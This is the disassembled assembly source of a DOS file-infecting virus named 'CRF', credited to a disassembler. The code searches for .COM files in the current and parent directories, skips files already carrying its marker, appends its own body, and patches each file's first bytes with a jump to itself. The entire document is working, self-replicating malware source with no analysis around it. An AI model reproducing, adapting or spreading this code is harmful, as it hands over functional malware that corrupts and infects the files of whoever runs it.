CRF
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
tof:
jmp short begin
nop ;Reserve 3rd byte
EOFMARK: db 26
first_four: nop
address: int 20h
check: nop
begin: call nextline
nextline: pop bp
sub bp,offset nextline
mov byte ptr [bp+offset infected],0
lea si,[bp+offset first_four]
mov di,offset tof
mov cx,4
cld
rep movsb
mov ah,1Ah
lea dx,[bp+offset DTA]
int 21h
mov ah,4Eh
lea dx,[bp+offset filespec]
lea si,[bp+offset filename]
push dx
jmp short continue
return: mov ah,1ah
mov dx,80h
int 21h
xor ax,ax ;AX= 0
mov bx,ax ;BX= 0
mov cx,ax ;CX= 0
mov dx,ax ;DX= 0
mov si,ax ;SI= 0
mov di,ax ;DI= 0
mov sp,0FFFEh ;SP= 0
mov bp,100h
push bp
mov bp,ax
ret
nextfile: or bx,bx
jz skipclose
mov ah,3Eh
int 21h
xor bx,bx
skipclose: mov ah,4Fh
continue: pop dx
push dx
xor cx,cx
xor bx,bx
int 21h
jnc skipjmp
jmp NoneLeft
skipjmp: mov ax,3D02h
mov dx,si
int 21h
jc nextfile
mov bx,ax
mov ah,3Fh
mov cx,4
lea dx,[bp+offset first_four]
int 21h
cmp byte ptr [bp+offset check],26
je nextfile
cmp byte ptr [bp+offset first_four],77
je nextfile
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
cmp ax,0FD00h
ja nextfile
mov [bp+offset addr],ax
mov ah,40h
mov cx,4
lea dx,[bp+offset first_four]
int 21h
mov ah,40h
mov cx,offset eof-offset begin
lea dx,[bp+offset begin]
int 21h
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
mov ax,[bp+offset addr]
inc ax
mov [bp+offset address],ax
mov byte ptr [bp+offset first_four],0E9h
mov byte ptr [bp+offset check],26
mov ah,40h
mov cx,4
lea dx,[bp+offset first_four]
int 21h
inc byte ptr [bp+offset infected]
jmp nextfile
NoneLeft: cmp byte ptr [bp+offset infected],2
jae TheEnd ;The party's over!
mov di,100h ;DI= 100h
cmp word ptr [di],20CDh
je TheEnd
lea dx,[bp+offset prevdir]
mov ah,3Bh
int 21h
jc TheEnd
mov ah,4Eh
jmp continue
TheEnd: jmp return
filespec: db '*.COM',0
prevdir: db '..',0
eof:
DTA: db 21 dup (?)
attribute db ?
file_time db 2 dup (?)
file_date db 2 dup (?)
file_size db 4 dup (?)
filename db 13 dup (?)
infected db ?
addr dw ?
main endp
code ends
end main